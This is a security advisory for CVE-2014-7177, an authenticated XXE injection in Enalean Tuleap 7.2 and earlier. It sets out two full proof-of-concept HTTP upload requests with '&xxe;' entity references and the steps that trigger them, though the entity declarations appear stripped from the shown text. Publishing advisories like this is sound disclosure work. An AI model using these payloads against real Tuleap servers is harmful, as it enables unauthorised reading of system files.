Status

Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap CVE: CVE-2014-7177 Vendor: Enalean Product: Tuleap Affected version: 7.2 and earlier Fixed version: 7.4.99.5 Reported by: Jerzy Kramarz Details: A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user. Successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as PoC to confirm the vulnerability. Vulnerability 1: 1) Upload a XXE using the following request: POST /plugins/tracker/?group_id=102&func=create HTTP/1.1 Host: [ip] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://[ip]/plugins/tracker/?group_id=102&func=create Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=4a8075ce16e338b4015405cfa2816319 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------25777276834778 Content-Length: 10561 -----------------------------25777276834778 Content-Disposition: form-data; name="group_id" 102 -----------------------------25777276834778 Content-Disposition: form-data; name="func" docreate -----------------------------25777276834778 Content-Disposition: form-data; name="group_id_template" 100 -----------------------------25777276834778 Content-Disposition: form-data; name="tracker_new_prjname" Commencez Ã taper -----------------------------25777276834778 Content-Disposition: form-data; name="create_mode" xml -----------------------------25777276834778 Content-Disposition: form-data; name="tracker_new_xml_file"; filename="xee.xml" Content-Type: text/xml ]> 123&xxe; e123&xxe; 123&xxe; attachment Attachments details Original Submission A full description of the artifact&xxe; summary Summary One line description of the artifact&xxe; cc CC status_id Status Artifact Status The artifact has been submitted&xxe; The artifact is no longer active. See the Resolution field for details on how it was resolved.&xxe; assigned_to Assigned to Who is in charge of solving the artifact&xxe; category_id Category Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...) severity Priority How quickly the artifact must be completed stage&xxe; Stage&xxe; Stage in the life cycle of the artifact&xxe; The artifact has just been submitted The cause of the artifact has been identified and documented The artifact will be worked on. The artifact is being worked on. Updated/Created non-software work product (e.g. documentation) is ready for review and approval. Updated/Created software is ready to be included in the next build Updated/Created software is in the build and is ready to enter the test phase The artifact fix has been succesfully tested. It is approved and awaiting release. The artifact was not accepted. The artifact is closed. Default The system default artifact report Results Default Graphic Report By Default For Support Requests -----------------------------25777276834778 Content-Disposition: form-data; name="name" 123 -----------------------------25777276834778 Content-Disposition: form-data; name="description" 123 -----------------------------25777276834778 Content-Disposition: form-data; name="itemname" e123 -----------------------------25777276834778 Content-Disposition: form-data; name="Create" CrÃ©er -----------------------------25777276834778-- 2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following: https://[ip]/plugins/tracker/?group_id=102&tracker=11 3) Using retrieved tracker number, a XXE can be trigerred by visiting the following URL: https://[ip]/plugins/tracker/?tracker=11&func=admin-formElements Vulnerability 2 1) Upload a XXE using the following request: < POST /plugins/tracker/?group_id=102&func=create HTTP/1.1 Host: [ip] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://[ip]/plugins/tracker/?group_id=102&func=create Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=e619b58add92383b3647ee5ba68c4a79 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------12077103611061 Content-Length: 25588 -----------------------------12077103611061 Content-Disposition: form-data; name="group_id" 102 -----------------------------12077103611061 Content-Disposition: form-data; name="func" docreate -----------------------------12077103611061 Content-Disposition: form-data; name="group_id_template" 100 -----------------------------12077103611061 Content-Disposition: form-data; name="tracker_new_prjname" Commencez Ã taper -----------------------------12077103611061 Content-Disposition: form-data; name="create_mode" xml -----------------------------12077103611061 Content-Disposition: form-data; name="tracker_new_xml_file"; filename="tracker_bugs.xml" Content-Type: text/xml ]> Bugs bug Bugs Tracker column8 Column Top 1 artifact_id Artifact ID Unique artifact identifier&xxe; submitted_by Submitted by User who originally submitted the artifact&xxe; column10&xxe; Column Top 2&xxe; last_update_date Last Modified On&xxe; Date and time of the latest modification in an artifact&xxe; open_date&xxe; Submitted on&xxe; Date and time for the initial artifact submission&xxe; fieldset_1 Details fieldset_default_desc_key summary Summary One line description of the artifact details Original Submission A full description of the artifact column10 Column Details 1 severity Severity Impact of the artifact on the system (Critical, Major,...) column10 Column Details 2 category Category Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...) close_date End Date End Date multi_assigned_to Assigned to (multiple) Who is in charge of this artifact fieldset1 Stage column3 Stage 1 status_id Status Artifact Status stage Stage Stage in the life cycle of the artifact The artifact has just been submitted The cause of the artifact has been identified and documented The artifact will be worked on. The artifact is being worked on. Updated/Created non-software work product (e.g. documentation) is ready for review and approval. Updated/Created software is ready to be included in the next build Updated/Created software is in the build and is ready to enter the test phase The artifact fix has been succesfully tested. It is approved and awaiting release. The artifact was not accepted. The artifact is closed. column4 Stage 2 resolution Resolution The resolution field indicates what happened to the bug. column9 Stage 3 assigned_to Assigned to Who is in charge of solving the artifact fieldset1 Attachments attachment Attachments fieldset1 References cross_references Cross references List of items referenced by or referencing this item. references References fieldset1 Permissions permissions_on_artifact Permissions on artifact Let users groups to define who can access an artifact. platform Platform source Source Customer from which the request comes from. version Version Product version concerned by the bug. title Titre DÃ©finir le titre d'un artÃ©fact status Ã?tat DÃ©finir l'Ã©tat d'un artifact contributor Contributor/assignee Define the contributor/assignee of an artifact Bugs The system default artifact report Results Charts Graphic Report Status Number of Artifacts by Status Severity Number of Artifacts by severity level Assignment Number of Artifacts by Assignee Default The system default artifact report Results 1 -----------------------------12077103611061 Content-Disposition: form-data; name="name" Bugs -----------------------------12077103611061 Content-Disposition: form-data; name="description" Bugs Tracker -----------------------------12077103611061 Content-Disposition: form-data; name="itemname" bug -----------------------------12077103611061 Content-Disposition: form-data; name="Create" CrÃ©er -----------------------------12077103611061-- 2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following: https://[ip]/plugins/tracker/?group_id=102&tracker=12 3) Using retrieved tracker number and URL, a XXE can be trigerred by visiting the retrieved URL: https://[ip]/plugins/tracker/?group_id=102&tracker=12 Further details at: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7177/ Copyright: Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.